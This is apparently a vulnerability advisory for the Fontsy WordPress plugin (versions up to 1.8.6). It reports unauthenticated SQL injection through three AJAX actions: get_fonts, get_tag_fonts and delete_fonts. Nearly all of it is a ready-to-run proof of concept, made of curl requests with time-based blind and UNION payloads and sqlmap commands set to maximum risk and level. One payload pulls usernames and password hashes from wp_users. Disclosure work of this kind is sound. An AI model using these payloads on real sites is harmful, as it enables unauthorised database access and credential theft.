Fontsy <= 1.8.6 - Multiple Unauthenticated SQLi

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

PoC

curl -i ‘http://example.com/wp-admin/admin-ajax.php?action=get_fonts’ \ --data ‘id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))hewu)’ … or use the sqlmap command below to automate the attack: sqlmap -u ‘http://example.com/wp-admin/admin-ajax.php?action=get_fonts’ \ --data ‘id=1’ \ -p id \ --risk 3 \ --level 5 \ --dbms mysql \ --batch -– curl -i ‘http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts’ \ --data ‘id=-1 UNION ALL SELECT NULL,NULL,NULL,CONCAT((SELECT user_login from wp_users),CHR(0x3a),(SELECT user_pass from wp_users)),NULL-- -’ … or use the sqlmap command below to automate the attack: sqlmap -u ‘http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts’ \ --data ‘id=1’ \ -p id \ --risk 3 \ --level 5 \ --dbms mysql \ --batch -– curl -i ‘http://example.com/wp-admin/admin-ajax.php?action=delete_fonts’ \ --data ‘font_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))kfTw)’ … or use the sqlmap command below to automate the attack: sqlmap -u ‘http://example.com/wp-admin/admin-ajax.php?action=delete_fonts’ \ --data ‘font_id=1’ \ -p font_id \ --risk 3 \ --level 5 \ --dbms mysql \ --batch